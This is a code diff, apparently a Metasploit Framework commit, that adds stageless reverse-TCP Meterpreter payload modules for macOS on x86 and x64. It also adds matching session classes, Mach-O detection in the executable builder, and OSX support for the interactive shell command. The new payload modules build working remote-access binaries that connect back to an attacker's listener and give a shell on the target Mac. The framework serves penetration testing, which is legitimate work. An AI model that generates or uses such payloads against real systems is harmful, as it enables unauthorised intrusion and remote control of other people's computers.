OSX meterpreter

lib/msf/base/sessions/meterpreter_x64_osx.rb

@@ -0,0 +1,29 @@
+# -*- coding: binary -*-
+
+require 'msf/base/sessions/meterpreter'
+
+module Msf
+module Sessions
+
+###
+#
+# This class creates a platform-specific meterpreter session type
+#
+###
+class Meterpreter_x64_OSX < Msf::Sessions::Meterpreter
+  def supports_ssl?
+    false
+  end
+  def supports_zlib?
+    false
+  end
+  def initialize(rstream, opts={})
+    super
+    self.base_platform = 'osx'
+    self.base_arch = ARCH_X64
+  end
+end
+
+end
+end
+

lib/msf/base/sessions/meterpreter_x86_osx.rb

@@ -0,0 +1,29 @@
+# -*- coding: binary -*-
+
+require 'msf/base/sessions/meterpreter'
+
+module Msf
+module Sessions
+
+###
+#
+# This class creates a platform-specific meterpreter session type
+#
+###
+class Meterpreter_x86_OSX < Msf::Sessions::Meterpreter
+  def supports_ssl?
+    false
+  end
+  def supports_zlib?
+    false
+  end
+  def initialize(rstream, opts={})
+    super
+    self.base_platform = 'osx'
+    self.base_arch = ARCH_X86
+  end
+end
+
+end
+end
+

lib/msf/util/exe.rb

@@ -106,7 +106,7 @@ def self.to_zip(files)
   # @return           [String]
   # @return           [NilClass]
   def self.to_executable(framework, arch, plat, code = '', opts = {})
-    if elf? code
+    if elf? code or macho? code
       return code
     end
 
@@ -2122,15 +2122,19 @@ def self.to_executable_fmt(framework, arch, plat, code, fmt, exeopts)
         end
       end
     when 'macho', 'osx-app'
-      macho = case arch
-      when ARCH_X86,nil
-        to_osx_x86_macho(framework, code, exeopts)
-      when ARCH_X64
-        to_osx_x64_macho(framework, code, exeopts)
-      when ARCH_ARMLE
-        to_osx_arm_macho(framework, code, exeopts)
-      when ARCH_PPC
-        to_osx_ppc_macho(framework, code, exeopts)
+      if macho? code
+        macho = code
+      else
+        macho = case arch
+        when ARCH_X86,nil
+          to_osx_x86_macho(framework, code, exeopts)
+        when ARCH_X64
+          to_osx_x64_macho(framework, code, exeopts)
+        when ARCH_ARMLE
+          to_osx_arm_macho(framework, code, exeopts)
+        when ARCH_PPC
+          to_osx_ppc_macho(framework, code, exeopts)
+        end
       end
       fmt == 'osx-app' ? Msf::Util::EXE.to_osx_app(macho) : macho
     when 'vba'
@@ -2258,6 +2262,10 @@ def self.elf?(code)
     code[0..3] == "\x7FELF"
   end
 
+  def self.macho?(code)
+    code[0..3] == "\xCF\xFA\xED\xFE" || code[0..3] == "\xCE\xFA\xED\xFE" || code[0..3] == "\xCA\xFE\xBA\xBE" 
+  end
+
 end
 end
 end

lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb

@@ -257,7 +257,7 @@ def cmd_shell(*args)
         print_error( "Failed to spawn shell with thread impersonation. Retrying without it." )
         cmd_execute("-f", path, "-c", "-H", "-i")
       end
-    when 'linux'
+    when 'linux', 'osx'
       # Don't expand_path() this because it's literal anyway
       path = "/bin/sh"
       cmd_execute("-f", path, "-c", "-i")

modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb

@@ -0,0 +1,40 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_x64_osx'
+
+module MetasploitModule
+
+  include Msf::Payload::Single
+  include Msf::Sessions::MeterpreterOptions
+  include Msf::Sessions::MettleConfig
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'          => 'OSX Meterpreter, Reverse TCP Inline',
+        'Description'   => 'Run the Meterpreter / Mettle server payload (stageless)',
+        'Author'        => [
+          'Adam Cammack <adam_cammack[at]rapid7.com>',
+          'Brent Cook <brent_cook[at]rapid7.com>'
+        ],
+        'Platform'      => 'osx',
+        'Arch'          => ARCH_X64,
+        'License'       => MSF_LICENSE,
+        'Handler'       => Msf::Handler::ReverseTcp,
+        'Session'       => Msf::Sessions::Meterpreter_x64_OSX
+      )
+    )
+  end
+
+  def generate
+    opts = {scheme: 'tcp'}
+    MetasploitPayloads::Mettle.new('x86_64-apple-darwin', generate_config(opts)).to_binary :exec
+  end
+end

modules/payloads/singles/osx/x86/meterpreter_reverse_tcp.rb

@@ -0,0 +1,40 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_x86_osx'
+
+module MetasploitModule
+
+  include Msf::Payload::Single
+  include Msf::Sessions::MeterpreterOptions
+  include Msf::Sessions::MettleConfig
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'          => 'OSX Meterpreter, Reverse TCP Inline',
+        'Description'   => 'Run the Meterpreter / Mettle server payload (stageless)',
+        'Author'        => [
+          'Adam Cammack <adam_cammack[at]rapid7.com>',
+          'Brent Cook <brent_cook[at]rapid7.com>'
+        ],
+        'Platform'      => 'osx',
+        'Arch'          => ARCH_X86,
+        'License'       => MSF_LICENSE,
+        'Handler'       => Msf::Handler::ReverseTcp,
+        'Session'       => Msf::Sessions::Meterpreter_x86_OSX
+      )
+    )
+  end
+
+  def generate
+    opts = {scheme: 'tcp'}
+    MetasploitPayloads::Mettle.new('i386-apple-darwin', generate_config(opts)).to_binary :exec
+  end
+end